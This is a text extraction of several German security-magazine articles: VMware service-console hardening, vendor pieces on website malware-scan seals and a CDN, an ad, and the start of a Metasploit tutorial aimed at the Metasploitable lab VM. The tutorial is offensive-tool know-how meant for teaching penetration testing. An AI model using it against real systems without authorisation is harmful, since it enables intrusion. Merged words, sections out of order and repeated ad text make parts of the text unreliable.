werden. Da auf ihm mehrere virtuelle Maschinen be-trieben werden, sollte vorher bestimmt werden, wie viel Prozessorleistung, Hauptspeicher und Festplattenplatz benötigt wird. Dazu müssen die Performance und der Ressourcenverbrauch für die geplanten virtuellen Ma-schinen ermittelt werden.
Möchte man bereits vorhandene physische Systeme virtualisieren, kann der Ressourcenbedarf für die ein-zelnen Systeme nicht einfach addiert werden. Das BSI empfiehlt hier, die Performance der verschiedenen Sys-teme zu messen und auf dieser Basis die Werte fest-zulegen.Außerdemsolltemanbeachten,dassdieVir-tualisierungssoftware (Snapshots, Auslagerungsdatei, Ereignisprotokolle) sowie der Hypervisor (Servicekon-sole) weitere Ressourcen benötigen.
Einsatzplanung für virtuelle MaschinenUm einen reibungslosen Betrieb der virtuellen Maschi-nen gewährleisten zu können, muss bezüglich ihrer Le-benszyklen vielerlei beachtet werden. Bevor die virtu-ellen Maschinen in Betrieb genommen werden, sollten ihre realistischen und angemessenen Ressourcenan-forderungen bestimmt werden. Danach ist zu prüfen, ob eventuelle Leistungseinschränkungen bei gelegent-lichen Lastspitzen hingenommen werden können oder nicht. Zusätzlich muss die Performance virtueller Ma-schinen überwacht werden, um sicherzustellen, dass die Ressourcenanforderungen ausreichend erfüllt wer-
den. Um Ressourcenengpässe früh zu erkennen, muss ein Prozess integriert werden. Nur so kann man schnell genug darauf reagieren.
Sichere Konfiguration virtueller MaschinenVirtuelle Maschinen sind in erster Linie genauso zu be-handeln und zu modellieren wie physische Maschinen. Es sollte aber darauf geachtet werden, dass den virtu-ellen Maschinen der Zugang zu Geräten oft erst noch gewährt werden muss (z.B. DVDLaufwerk). Diese Ge-räte können meist aus der virtuellen Maschine über die Gastwerkzeuge gesteuert werden.
Sicherung der ServicekonsoleDie Sicherung der Konsole ist möglich, indem sie mithil-fe eines abgeschotteten Managementnetzwerkes sepa-riert wird. Dafür sollte eine eigene Netzwerkkarte sowie eine VLAN-ID vorgesehen werden.Anschließend sollte der root-Zugriff eingeschränkt
werden, da dieser eine enorme Bedeutung für die Ver-waltung von Dateien und Diensten hat. Zudem muss ein kompliziertes root-Passwort gewählt werden, das in bestimmten Zeitabständen erneuert wird. Der Zeitab-stand kann mithilfe des folgenden Befehls in der Kon-sole festgelegt werden:
esxcfg-auth --passmaxdays=[Anzahl-der-Tage]
Bsp. esxcfg-auth --passmaxdays=30
Abbildung 5. Separierung der Servicekonsole
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum
hakin9.org/de 25
Damit nicht jeder Benutzer mittels sudo oder su root-Rechte erlangen kann, wird eine wheel-Gruppe be-nutzt. Benutzer die in den root-Modus wechseln dür-fen, müssen mit folgendem Befehl in die wheel-Grup-pe hinzugefügt werden:
usermod -G wheel Benutzer Bsp. usermod -G wheel Max
Als nächstes wird der su-Befehl angepasst, damit nur root und die wheel-Gruppe die root-Rechte besitzen. Dies geschieht mittels:
chgrp wheel /bin/su
chmod 4750 /bin/su
Damit die wheel-Gruppe den sudo-Befehl nutzen kann, muss die /etc/sudoers mittels Befehl visudo in einem Editor gestartet und editiert werden. Dabei wird die Zeile #%wheel ALL = (ALL) ALL auskommentiert. Einen zusätzlichen Schutz der Servicekonsole bietet die integrierte Firewall, die standardmäßig schon aufeiner hohen Sicherheitsstufe eingestellt ist.
Sicherer Betrieb von virtuellen InfrastrukturenWenn ein Fehler auf einem Virtualisierungsserver ent-steht, kann dieser Auswirkungen auf alle virtuellen Ma-schinen haben die auf ihm betrieben werden. Mithilfe von webbasierten Administrationsoberflächen oder ei-ner Administrationssoftware (VMware vSphere Client, VMware vCenter), kann man lokal und über das Netz auf einen Virtualisierungsserver zugreifen. Somit hat man die Möglichkeit den Server oder dessen virtuelle Maschinen zu steuern, zu warten oder zu überwachen.
Ein weiterer Punkt ist die Überwachung des Betriebszu-standes. Die Auslastung der Ressourcen sollte kontinuier-lich geprüft werden. Nur so kann ermittelt werden, ob aus-reichend Prozessorressourcen zur Verfügung stehen, die den Performanceanforderungen der virtuellen Maschinen genügen. Ob Hauptspeicherengpässe vorliegen, die die Verfügbarkeit der virtuellen Maschinen gefährden könn-ten, muss ebenfalls kontrolliert werden. Besonders bei der Verwendung des Memory Overcommitments sollte ein Prozess etabliert werden, der den Hauptspeicher ständig überwacht und einen drohenden Engpass früh erkennt. Diese Überwachungsaufgaben können automatisiert wer-den und zum Beispiel durch E-Mail-Benachrichtigungen überUnregelmäßigkeiteninformieren.
Voraussetzungen für die empfohlenen Maßnahmender BSI sind fachkundige und speziell geschulte Mit-arbeiter. Hier sollte nicht gespart werden. Eine falsche Planung und nicht vorhandenes Fachwissen können zu einer späteren Behinderung oder sogar zu einem Aus-fall des Produktivbetriebs führen. Damit ein fortlaufen-der und reibungsloser Betrieb möglich ist, sollte also nur einschlägig ausgebildetes Personal mit und in den virtuellen Welten arbeiten.
Sicherung zwischen Internet und virtueller WeltBesitzen virtuelle Maschinen eine Verbindung zum In-ternet, ist selbstverständlich auch hier eine Sicherheits-software erforderlich. Diese kann als virtuelle Lösung oder in Form einer Hardware-Lösung bereitgestellt wer-den. Stellt beispielsweise ein Unternehmen seine vor-handene physische Infrastruktur auf eine virtuelle um und besitzt eine Hardware-Firewall- und Antivirus-Lö-sung, so kann diese weiterhin verwendet werden. Es entstehen keine weiteren Kosten für das Unternehmen. Soll die Firewall selbst in einer virtuellen Maschine be-trieben werden, muss diese aus Sicherheitsgründen auf einem eigenen Host installiert werden. Dadurch entste-hen für das Unternehmen zusätzliche Software- und Hardware-Kosten, die sich nur rechnen, wenn mehre-re Sicherheitslösungen auf dem Host betrieben werden sollen. Ansonsten empfiehlt es sich, zu einer Hardware-Lösung zu greifen. Virtuelle Systeme. die keinen Zu-gang zum Internet besitzen, können mittels einer ein-fachen Firewall-Software überwacht werden. Bei einem sehr geringen Schutzbedarf, beispielsweise bei einem einfachen Test-System, reicht meist schon die in Win-dows Systemen integrierte Firewall aus.
Ausblick VMware hat dieses Sicherheitsproblem erkannt und mit der Einführung der vShield Zones und der VMsafe API minimiert. Durch eine Zusammenarbeit mit zahlreichen Security-Software Herstellern wie beispielsweise McA-fee, Kaspersky oder Trend Micro können neue Sicher-heitskonzepte entwickelt werden und so die Sicherheit in einer virtuellen Infrastruktur immer weiter vorantrei-ben. Einige Vorreiter wie die Deep Security Lösung von Trend Micro gibt es bereits und es werden sicherlich weitere folgen.
Im Internet• http://www.vmachine.de• https://www.bsi-fuer-buerger.de/cln_030/ContentBSI/Aktuel-
les/Veranstaltungen/gstag/gstag_160310.html• http://www.vmware.com• http://www.pc-ware.com
STEVE HAMPICKEAbgeschlossenes Studium (Diplom FH) der Automatisierungstech-nik/ Computersystemtechnik Diplomarbeit bei PC-WARE beschäftig-te sich mit dem Thema „Analyse sicherheitsrelevanter Ressour-cenoptimierung in virtuellen IT-Infrastrukturen“ beschäftigt sich weiterhin in seiner Freizeit mit VMware-LösungenKontakt mit dem Autor: [email protected]
1/201126
Für Online-Shop- und Website-Betreiber gilt es da-her Lösungen zu finden, mit deren Hilfe sie Be-suchern ihrer Website, also potenziellen Kunden,
aufzeigen können, dass sie sich auf einer vertrauens-würdigen, sicheren Website befinden, die täglich auf Schadcode, Malware und sonstige Schwachstellen hin gescannt wird.
Diese Möglichkeit bieten ihnen das Gütesiegel des Comodo HackerProof und das VeriSign Trust Seal, die wir Ihnen im Rahmen dieses Beitrages samt der dahin-ter steckenden technischen Lösungen näher vorstellen.
Comodo HackerProof: Simulierte Attacken und FrühwarnsystemDer Comodo HackerProof kombiniert unterschiedlichs-te Lösungen, um die Sicherheit und Vertrauenswürdig-keit von Websites zu gewährleisten und zu signalisie-ren:
• Simulierte Attacken und Malware-Scans im 24h-Takt
Alle 24 Stunden prüft der ausgefeilte Scan-Algo-rithmus des Comodo HackerProof die Website des Anwenders auf Sicherheitslücken, die durch Ha-cker ausgenutzt werden könnten. Zum Einsatz kommt dabei eine ganze Batterie an Schwachstel-len-Tests. Der Scan wird automatisch seitens des Comodo HackerProof-Servers initiiert. Insbeson-
dere wird geprüft, ob die Website anfällig für Deni-al-of-Service-Attacken ist, der Server über offene beziehungsweise ungeschützte Ports verfügt, un-sichere Protokolle oder nicht gepatchte Software ausführt. Hierzu simuliert der HackerProof-Server wirklichkeitsnahe aber nicht schädliche Angriffe auf den entsprechenden Web-Server. Am Ende eines jeden Scans generiert die Lösung einen detaillier-ten Report, in dem sämtliche Schwachstellen prä-zise aufgelistet sind und für die bei Bedarf eine Lö-sung vorgeschlagen wird.
• SiteInspector: Das Frühwarnsystem Zum integralen Bestandteil seines HackerProof
hat Comodo mit dem SiteInspector ein intelligen-tes Frühwarnsystem auserkoren. Der SiteInspec-tor simuliert den Besuch der Website durch einen potenziellen Kunden und überprüft dabei das Sys-tem auf die spezifischen Gefahren, denen Besu-cherderWebsiteausgesetztsind.InfizierteSeiten,die etwa das Betriebssystem des Besuchers schä-digen könnten, werden unmittelbar gemeldet und können daraufhin vom Website-Betreiber entfernt werden. SiteInspector geht damit einen Schritt wei-ter als herkömmliche Scanning-Services, indem die Sicherheit einer Website aus Sicht des Besuchers überprüft wird.
• PCI-Scanning: Den Sicherheitsstandards der Kreditkartenindustrie entsprechen
Malware-Scan mittels Comodo HackerProof oder VeriSign Trust Seal
Bedingt durch die Befürchtung vieler Verbraucher, beim Einkauf im Internet Opfer von Identitäts- beziehungsweise Datendiebstahl zu werden, entgingen Online-Händlern allein im Jahr 2008 Umsätze in Höhe von 21 Milliarden US-Dollar. Das ergaben Studien von VeriSign, einem Spezialisten für Zertifikatslösungen im Internet.
IN DIESEM ARTIKEL ERFAHREN SIE…• Wie die Vertrauenswürdigkeit und Sicherheit einer Website
durch kombinierte Lösungen gewährleistet werden kann• EinzelheitenüberdasbekanntesteGütesiegelimInternet
WAS SIE VORHER WISSEN SOLLTEN…• Der wirtschaftliche Schaden für Online-Händler aufgrund
mangelnden Vertrauens vieler Verbraucher in die Sicherheit derWebsitekosteteimJahr2008rund21MilliardenUS-Dollar.
• Grundkenntnisse über die Sicherheitsstandards der PaymentCardIndustry(PCI)
Christian Heutger, Geschäftsführer PSW Group
Malware-Scan mittels Comodo HackerProof oder VeriSign Trust Seal
www.psw.net 27
merce erzielt werden konnten. So misst das Feature beispielsweise, wie oft die Besucher der Website, den Mouse-Over-Effekt des Trust-Mark genutzt ha-ben, um die Sicherheit der Website näher zu verifi-zieren.
Comodo HackerProof: Die wichtigsten Merkmale• Täglicher, umfassenderScanderWebsiteaufSi-
cherheitslücken, Malware und andere Schwach-stellen, die durch Hacker ausgenutzt werden kön-nen.
• InnovativeSiteInspector-Technologie schütztWeb-site-Besucher vor Drive-by-Attacken und anderem schädlichem Website-Content.
• Integriertes PCI-Scanning zur Umsetzung der Si-cherheitsstandards der Kreditkartenindustrie.
• Webbasiertes Management des HackerProof: Re-porting-Funktionalitäten geben Aufschluss über Schwachstellenbehebungen, Testergebnisse und Return-on-Investment.
• Besuchern via Mouse-Over Informationen überTests und verifiziert die Sicherheit derWebsite inEchtzeit.
• Patentierte Trust-Mark-Technologie trägt für Aus-fallsicherheit und einfache Einbindung in die Web-site (ohne Layout-Änderungen) Sorge.
VeriSign Trust Seal: Hoher Bekanntheitsgrad gepaart mit Malware-Scan und Betreiber-AuthentifizierungDas VeriSign Trust Seal ist eine Erweiterung des Ve-riSign Seal, einem der bekanntesten Sicherheitssie-gel im Internet, das im Durchschnitt täglich 250 Millio-nen Mal auf mehr als 90.000 Websites angezeigt wird, unter anderem von 97 der 100 größten Banken, die SSL-Zertifikate verwenden. Anders als beim VeriSign Secured Seal kommt das Trust Seal zum Zug, wenn keinerlei SSL-Zertifikate genutzt werden. Kommen SSL-Zertifikate auf einer Website aber doch zur An-wendung, muss der Website-Betreiber zwingend auf VeriSign SSL zurückgreifen, um ein Trust Seal zu er-halten.
Das VeriSign Trust Seal basiert im Wesentlichen auf vier Features:
• Authentifizierung Als vertrauenswürdige dritte Partei prüft VeriSign
die Identität des Website-Betreibers und stellt si-cher, dass er der rechtmäßige Inhaber der Web- site ist. Dies geschieht unter anderem anhand des Whois-Eintrages zur betroffenen Domain. Das Sie-gel belegt somit auf einer Website, dass deren Be-treibervonVeriSigneinwandfreiauthentifiziertwer-den konnte.
Ebenfalls mit an Bord hat der HackerProof das so-genannte PCI-Scanning. Es erfolgt vierteljährlich und überprüft die Website auf die Erfüllung der hochgradige Sicherheit garantierenden Standards der Payment Card Industry (PCI). Diese sehen unter anderem die „Installation und Pflege einerFirewall zur Absicherung aller Daten“, die „Ent-wicklung und Pflege sicherer Systeme und An-wendungen“ und „kontinuierliche Prüfungen aller Sicherheitssysteme und –prozesse“ für Website-Betreiber, die Kreditkartendaten verarbeiten, zwin-gend vor.
• Comodo HackerProof-Siegel: Sicherheitszer-tifikatmitMouse-Over-Effekt
Eine wichtige Komponente des HackerProof – ge-rade im Hinblick auf die Vertrauensbildung im E-Commerce – ist das Trust-Mark. Es bescheinigt und verifiziert die Sicherheit der besuchten Web- siteinEchtzeit.Das„Sicherheitszertifikat“wirdvomWebsite-Betreiber per JavaScript in seine Web- site integriert und offenbart, wann die Website zum letzten Mal dem HackerProof-Scan unterzogen worden ist. Eine Besonderheit ist, dass es mit ei-nem Mouse-Over-Effekt ausgestattet ist. Bewegt der Besucher der Website seinen Mauszeiger über das Trust-Mark werden ihm weitere Informationen zum letzten Scan-Zeitpunkt und dem HackerProof angezeigt.
Comodo HackerProof: Webbasiertes Management-ToolDer Comodo HackerProof ist ein reines Online-Tool. Installationen auf Clients sind somit nicht erforder-lich. Der Login in das Lösungsbundle ist über die Website von Comodo möglich. Hier erlaubt ein an-wenderfreundliches Interface sowohl die komfortable Verwaltung und Analyse als auch die Auswertung der Umsatzsteigerungen, die durch den vertrauensbil-denden Einsatz des Comodo HackerProof im E-Com-
1/201128
• TäglicherMalware-Scan Das VeriSign Trust Seal sieht vor, dass die Web-
site täglich auf Malware gescannt wird. Werden in diesem Rahmen schädliche Codes festge-stellt, wird der Website-Betreiber davon per E-Mail in Kenntnis gesetzt. In diesem Rahmen wird er aufgefordert, sich in seinen Account beim Ve-riSign Trust Center einzuloggen. Dort findet derWebsite-Betreiber dann eine detaillierte Über-sicht über die Seiten seines Web-Angebots, die infiziertsind,sowieüberdiegenauenCodes,diedie Sicherheitsprobleme verursachen. Dem Web-site-Betreiber wird so ermöglicht, den Schadcode schnellaufzufindenundihnzuentfernen.ImAn-schluss kann er einen erneuten Scan seiner Website beantragen. Über den gesamten Zeit-raum hinweg, wird das VeriSign Trust Seal nicht mehr auf der betroffenen Website dargestellt. Es erscheint erst wieder, wenn im Rahmen des er-neuten Scans festgestellt worden ist, dass die Malware entfernt worden ist.
• DasTrustSeal Das Trust Seal selbst ist wie der Comodo Hacker-
Proof ein Erkennungszeichen, das den Besuchern einer Website signalisiert, sich auf einer sicheren, vertrauenswürdigen Seite zu befinden. Bei Klickauf das Siegel öffnet sich die so genannte „Veri-Sign Trust Seal Verification Page“. Sie beinhal-tet Informationen über die Website sowie über die Identität des rechtmäßigen Website-Betreibers, dievonVeriSignimVorfeldverifiziertwurde.Hier-zu zählen Name, Ort und Land. Außerdem können BesucheraufderVerificationPagefeststellen,wieder jüngste Malware-Scan verlaufen ist. Mit die-ser Transparenz ist sichergestellt, dass die Besu-cher der Website darauf vertrauen können, dass die Website nicht von Hackern manipuliert wor-den ist. Das VeriSign Trust Seal kann vom Web- site-Betreiber erst nach erfolgter Identifizierungsowie erstem Malware-Scan per Copy and Paste in die Website integriert werden.
• Seal-in-Search Das VeriSign Trust Seal umfasst neben der Au-
thentifizierung des Website-Betreibers ein wei-teres interessantes Feature, das es von ande-
ren Sicherheitssiegeln unterscheidet: Das soge-nannte Seal-in-Search. Dabei handelt es sich um ein Feature, dass es ermöglicht, dass das Trust Seal im Zusammenhang mit der eigenen geprüf-ten Website auch in den Ergebnislisten der gro-ßen Suchmaschinen angezeigt wird. Einzige Vor-aussetzung für die Anzeige ist, dass sich der End-nutzer das kostenfreie Browser-Plug-in „AVG Link-Scanner“ installiert hat. Mit Seal-in-Search kön-nen sich Website-Betreiber bereits in den Sucher-gebnissen mit ihren von VeriSign als sicher zerti-fiziertenWebseiten von der Konkurrenz abhebenundsomehrTrafficgenerieren.DietäglichenMal-ware-Scans verhindern außerdem, dass die eige-ne Website dem Blacklisting von Suchmaschinen zum Opfer fällt.
VeriSign Trust Seal: Die wichtigsten Merkmale• Herauszustreichen ist vor allem der hohe Be-
kanntheitsgrad des VeriSign Trust Seal: Über 250 Millionen tägliche Einblendungen sprechen für sich.
• Auch die Authentifizierung des rechtmäßigen Be-treibers der Website u.a. per Whois-Datenabgleich stellt ein wichtiges Merkmal des Siegels dar.
• Täglicher,umfassenderScanderWebsiteaufMal-ware.
• Online-Zugriff über das VeriSign Trust Center aufReporting-Funktionalitäten.HierfindetsichbeiMal-ware-Befall eine detaillierte Aufschlüsselung aller infiziertenSeiten.
• Zeitnaher Re-Scan nach der Beseitigung vonSchadcode.
• Schutz vor Aufnahme der eigenenWebsite in dieBlacklists von Suchmaschinen.
• Mehrwert im Suchmaschinen-Marketing dank derSeal-in-Search-Technologie.
• Transparenz für die Website-Besucher dank denAuskünften der VeriSign Trust Seal Verification Page.
• Schnelle und simple Einbindung des Siegels perCopy and Paste.
FazitDer Erfolg gibt den digitalen Gütesiegeln Recht. So be-legenetwaUntersuchungenderComodoGroup,dass78 Prozent der Online-Shopper einem Gütesiegel wie dem Comodo HackerProof oder dem VeriSign Trust Seal glauben, dass ihre Daten sicher sind. Und Stu-dien von VeriSign konnten nachweisen, dass die On-line-Verkäufe und Konversionen auf Websites, die über ein VeriSign-Siegel verfügen, um bis zu 34 Prozent ge-steigert werden konnten.
Die rasche Auslieferung statischer Inhalte mittels Secure CDN
www.psw.net 29
Indem sie dafür sorgt, dass Besucher Freude an einer „schnellen“ Website haben und sie dadurch öfter besu-chen sowie länger auf ihr verweilen, übt die Lade-Ge-
schwindigkeit einen wesentlichen Einfluss auf die Quali-tät eines Websitebesuchs und damit auf den Umsatz aus.
Content Delivery Networks (CDN)Um eine möglichst hohe Übertragungsgeschwindig-keit zu erreichen, bietet sich die Nutzung eines Content Delivery Networks (CDN) an. Als Geflecht über das In-ternet verbundener Server, ermöglicht es eine Auslie-ferung statischer Inhalte wie Grafiken, Bilder und Ja-vaScripts vom jeweils nächstgelegenen Server aus. Auch Software-Downloads, Video-Streams oder der Betrieb von Online-Games wird in hoher Geschwindig-keit ermöglicht. Um dies zu erreichen, liefern klassische CDNs Inhalte von vielen kleinen Standorten aus.
Um die Übertragungsgeschwindigkeit weiter zu opti-mieren, ist es allerdings sinnvoller, nur wenige, strate-gisch platzierte Points of Presence (POPs) zu betrei-ben. Die POPs sollten in unmittelbarer Nähe zu den wichtigsten Internetknoten weltweit liegen und dadurch direkt mit allen großen Netzwerken verbunden sein. CDNs, die dieser Strategie folgen, werden als CDNs der zweiten Generation betrachtet.
Ein eben solches 2nd-Generation-CDN ist das renom-mierte EdgeCast CDN, das strategisch entsprechend vorteilhaft positioniert ist und auf POPs in San Jose, Los
Angeles, Ashburn, New York, Chicago, Dallas, Atlanta, Seattle, London, Frankfurt, Paris, Hong Kong, Singapur, Tokio und Sydney zurückgreift. Dort sind die POPs au-ßerdem in Tier 1-Rechenzentren untergebracht, was die POPs zu so genannten „Super POPs“ mutieren lässt, die auf robusten Backbone, vielfacher Redundanz und dar-aus resultierend hoher Verfügbarkeit basieren.
Klassisches CDN vs. Second-Generation-CDN (EdgeCast CDN)Das klassische CDN …
• verlässtsichvollundganzaufDNS,umdiejewei-lige Position des auf Inhalte zugreifenden Endnut-zers zu ermitteln.
• benötigt8Schritte,umdenNutzerzuverlässigmitdem gewünschten Content zu beliefern:• DerEndnutzerfragteineIP-Adressefürcontent.
domain.com an, um die dort hinterlegten Inhalte abzurufen.
• Der ISP desNutzers fordert beimRoot-Serverdie IP-Adressen der autoritativen Domain-Na-me-Server von domain.com an.
• Der Root-Server liefert als Antwort die IP-Ad-ressen der autoritativen DNS-Server zurück.
• DerDNS-ServerdesISPgreiftwillkürlichaufei-nen der autoritativen DNS-Server zurück, wobei die Distanz zwischen dem DNS-Server des ISP
Die rasche Auslieferung statischer Inhalte mittels Secure CDN - Weil auch bei der Sicherheit die Geschwindigkeit zählt
Bei der Übertragung von Inhalten ist auf Websites und in Online-Shops die Geschwindigkeit einer der wesentlichsten Erfolgsfaktoren: Denn Kundenbindung sowie ein gutes Listing in Suchmaschinen sind im Internet eben auch von der Höhe der Geschwindigkeit abhängig, mit der Inhalte – ganz gleich ob Texte, Bilder, Flash-Content, Scripts oder Videos – geladen werden.
IN DIESEM ARTIKEL ERFAHREN SIE…• Höchste Sicherheitgepaartmitmodernster Server-Technolo-
gie liefert das Secure Content Delivery Network (Secure CDN).• Mittels HTTPS beinhaltet Secure CDN eine sichere Ausliefe-
rung großer Datenaufkommen.
WAS SIE VORHER WISSEN SOLLTEN…• Ein gutes Listing in Suchmaschinen sowie Kundenbindung
hängen im e-Commerce wesentlich von der Ladezeit (Ge-schwindigkeit) der Website-Inhalte ab
• Grundkenntnisse über die Funktionsweise / Aufbau des Do-main Name Systems bzw. von Netzwerkdiensten
Christian Heutger, Geschäftsführer PSW Group
1/201130
• Der EdgeDirector stellt sicher, dass der Nutzerauch weiterhin über den für ihn vorteilhaften POP Inhalte ausgeliefert bekommt.
• TrittbeidemPOPinSydneyabereinProblemauf,verbindet der EdgeDirector den Nutzer mit dem POP in Hong Kong. Denn dieser ist nach dem POP inSydneyderdemNutzergeografischamnächst-gelegenen POP.
• Steht der POP in Sydney dann wieder zur Verfü-gung und erweist sich als der für den Nutzer effek-tivste lokale POP, so bekommt der Nutzer die Inhal-te künftig wieder über diesen geliefert.
Wie das „Secure“ zum CDN kommtDas EdgeCast CDN kann als Secure CDN bezeich-net werden. Denn das CDN der zweiten Generation ist neben seiner hohen Performance zusätzlich mit Si-cherheitsmerkmalen wie dem Support des HyperText Transfer Protocol Secure (HTTPS) ausgestattet. Damit können Daten und Inhalte „abhörsicher“, da verschlüs-selt, aber dennoch weiterhin in hoher Geschwindigkeit übertragen werden.
Als weitere Sicherheitsfunktionen kommen die Unter-bindung von Direkt-Verlinkungen mittels Token-Authen-tifizierung, die Geo-Filterung, die Benutzerzugangsbe-schränkung anhand von IP-Adressen und die SWF- und Token-Authentifizierung in Verbindung mit Flash-Strea-ming hinzu.
Merkmale des EdgeCast CDN
• SchnelleAuslieferung von Inhalten unter anderemDank patentierter EdgeDirector-Technologie.
• WeitgehendunabhängigvonDNS.• Hohe Sicherheit: HTTPS-Support, Token-Authen-
tifizierung, Geo-Filterung, Benutzerzugangsbe-schränkung, Möglichkeit der Bandbreitendrosse-lung.
• Für Auslieferung von Rich Media-Elementen wiehochauflösendeVideosoderLive-Streamingsopti-miert.
• Unterstützung von On-Demand- als auch Live-Streaming mittels Adobe Flash, Windows Media und Microsoft Silverlight.
• Höchstmaß an Flexibilität, die es erlaubt, Inhal-te entweder auf dem eigenen Server zu speichern oder auf Speicherknoten hochzuladen, um sie dort von Cache-Servern abholen und über das Netz-werk verteilen zu lassen.
• Websitebetreiber kann durch benutzerdefinierteRegeln festlegen, wie die Serverknoten Inhalte ca-chen und ausliefern.
• Über eine webbasierte Analyse-Suite können ak-tuelle Leistungsdaten permanent eingesehen wer-den.
und dem autoritativen DNS-Server sehr groß sein kann.
• Der autoritative DNS-Server antwortet mit derAdresse eines der Delivery-Server des betroffe-nen Netzwerkes, das dem DNS-Server des ISP am nächsten liegt.
• ErstjetztkannderDNS-ServerdesISPdenNutzermit der IP-Adresse des Delivery-Servers versorgen.
• DerNutzerfragtdanndenDelivery-Serveran.• DerDelivery-ServerbeantwortetdieNutzer-An-
frage und der Nutzer bekommt die gewünschten Inhalte geliefert.
Das EdgeCast CDN …
• arbeitetunabhängigvonDNS.• cachtDNS-EinträgeüberlängereZeiträumehinweg,
sodass anders als bei klassischen CDNs nicht jedes Mal eine DNS-Abfrage durchgeführt werden muss.
• greift auf die patentierteEdgeDirector-Technologiezurück (im nächsten Abschnitt erfahren Sie mehr über deren Funktionsweise)
• benötigtnur4Schritte,umdenNutzerzuverlässigmit dem gewünschten Content zu beliefern: • DerEndnutzerfragteineIP-Adressefürcontent.
domain.com an, um die dort hinterlegten Inhalte abzurufen.
• DerDNS-Server vom ISPdesNutzersantwor-tet unmittelbar auf die DNS-Anfrage und greift dabei auf den Cache zurück.
• Der EdgeDirector leitet den Nutzer zu demnächstgelegenen Delivery-Server.
• DerDelivery-ServerbeliefertdenNutzermitdengewünschten Inhalten.
Zur Funktionsweise der EdgeDirector-TechnologieDurch ein kontinuierliches Monitoring generiert die paten-tierte EdgeDirector-Technologie stets aktuelle Übersich-ten über alle aktiven IP-Blöcke sowie über die Geschwin-digkeitdesZugriffsdurchjedenIP-BlockaufjedenPOP.Dadurch istsie inderLagealleNutzerohneZeitverlustmit dem jeweiligen lokalen oder zumindest dem geogra-fisch am nächsten gelegenen POP zu verbinden. Damit wird wiederum eine schnelle Auslieferung von Inhalten über das CDN an den Nutzer realisiert. Ist ein POP einmal überlastet beziehungsweise ein anderer nächstgelegener POP weist eine bessere Performance auf, verbindet die EdgeDirector-Technologie den Nutzer mit diesem, bis sein „angestammter“ POP wieder voll funktionstüchtig ist.Ein Beispiel:
• DerlokaleEdgeDirectorstelltfest,dasseinNutzeraus Australien stets über den POP in Sydney auf Content zugreift.
Einfach sicher surfen.
Abstand schafft Sicherheit!
Angriffe auf Daten und Systeme über Schwachstellen in internetgebundenen Applikationen drohen täglich.Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Systems (ReCoBS) der m-privacy GmbH.
m-privacy GmbHFünfter Nationaler IT-Gipfel7. Dezember 2010Internationales Congress Center Dresden www.m-privacy.de/presse/veranstaltungen
Sehen wir uns?Am Köllnischen Park 110179 BerlinFon: +49 30 243423-34Fax: +49 30 [email protected]
Halten Sie die Gefahren des Internets auf Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Systems (ReCoBS) der m-privacy GmbH.
Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser
Applikationen drohen täglich.Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Halten Sie die Gefahren des Internets auf Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Halten Sie die Gefahren des Internets auf Halten Sie die Gefahren des Internets auf Distanz – mit Remote Controlled Browser Systems (ReCoBS) der m-privacy GmbH.
10/201032
TOOLS
Genaue und stets aktuelle Informationen zu be-sitzen ist heutzutage sehr viel wert, alles andere gleicht einem Blindflug im Düsenjet. Dies stimmt
jedenfalls auch in Verbindung mit Penetrationstest. Ein Test kann immer nur das widerspiegeln was überhaupt erst entdeckt wurde. Das Metasploit Framework[1] eignet
sich in besonderer Weise als unterstützendes Mittel beim Pentesting. So lassen sich diverse Tools wie z.B. nmap bequem einklinken und machen es somit zu einem inte-ressanten Werkzeug. Dieser Artikel wird sich ausschließ-lich mit dem Metasploit Framework (MSF) auseinander-setzen. Das MSF an sich ist eines der bekanntesten Open
Das Metasploit Framework als Unterstützung bei Penetrationstests
Kann ein quelloffenes Pentesting-Tool an seine kommerzielle Pendants heranreichen? Welche Informationen eines Zielsystems brauche ich für einen erfolgreichen Exploit? Welche Vorteile bringt das Metasploit Framework?
IN DIESEM ARTIKEL ERFAHREN SIE...• wie man das Metasploit Framework aufsetzt• erste Schritte im MSF • Vor- und Nachteile des Frameworks
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...• grundlegende Kenntnisse auf der Kommandozeile
Alexander Winkler
Abbildung 1. Metasploitable gestartet
Das Metasploit Framework als Unterstützung bei Penetrationstests
hakin9.org/de 33
ten Ubuntu 8.04 Server in Standardkonfiguration auf dem verschiedene angreifbare Dienste laufen. Metasploitable liegt als VMware Image vor und kann somit direkt in einer Virtualbox-Instanz oder dem VMware-Player ausgeführt werden. Somit wäre unser Zielsystem bereit und wartet sozusagen nur darauf exploited zu werden.
InstallationUm das Framework zu laden gibt man auf der Kom-mandozeile seines Hostsystems folgenden Befehl ein:
svn checkout http://metasploit.com/svn/framework3/trunk/
metasploit
Nun wird ein Ordner metasploit angelegt und das ca. 200MB große Framework in seiner letzten SVN herun-tergeladen. Falls noch nicht geschehen, muss noch das aktuelle Ruby on Rails Framework installiert werden.
sudo gem install -v=2.3.2 rails Danach starten wir die msfconsole mit: sudo ./msfconsole Es erscheint nach kurzer Zeit der Begrüßungsschirm des MSF.
Wir sehen hier, dass uns in dieser Version von Me-tasploit 616 Exploits und 215 Payloads zur Verfügung stehen. Eine immense Zahl, wenn man bedenkt, dass bei der ersten Ausgabe des Frameworks gerade mal ei-ne handvoll Exploits zur Verfügung standen.
AnwendungNun können wir mit dem Kommando msf > help eine Lis-te der zur Verfügung stehenden Befehle erhalten. Für die Anwendung des MSF ist es wichtig zu wissen wel-ches Ziel wir verfolgen. Wir wissen ja, dass sich unser Zielsystem im gleichen Netz befindet, wir führen also ei-nen Scan aus, um im besten Fall offene Ports vorzufin-
